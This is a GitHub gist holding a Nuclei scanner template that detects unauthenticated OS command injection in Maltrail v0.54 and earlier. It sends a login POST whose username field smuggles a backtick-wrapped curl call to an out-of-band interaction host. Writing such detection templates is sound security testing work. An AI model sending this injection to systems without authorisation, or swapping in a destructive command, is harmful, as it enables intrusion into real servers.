Forked from Esonhugh/maltrail-command-injection.nuclei.yaml
Created
December 18, 2023 06:50
-
-
Save emadshanab/5a22b8f3c0f3de25addc70344d0dc2f3 to your computer and use it in GitHub Desktop.
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: maltrail-os-command-injection | |
info: | |
author: Esonhugh | |
name: Unauthenticated OS Command Injection in stamparm/maltrail | |
severity: critical | |
description: | | |
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process. | |
reference: | |
- "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/" | |
variables: | |
payload: "curl+{{interactsh-url}}" | |
http: | |
- path: | |
- "{{BaseURL}}/login" | |
- "{{BaseURL}}login" | |
method: POST | |
body: "username=;`{{ payload }}`" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment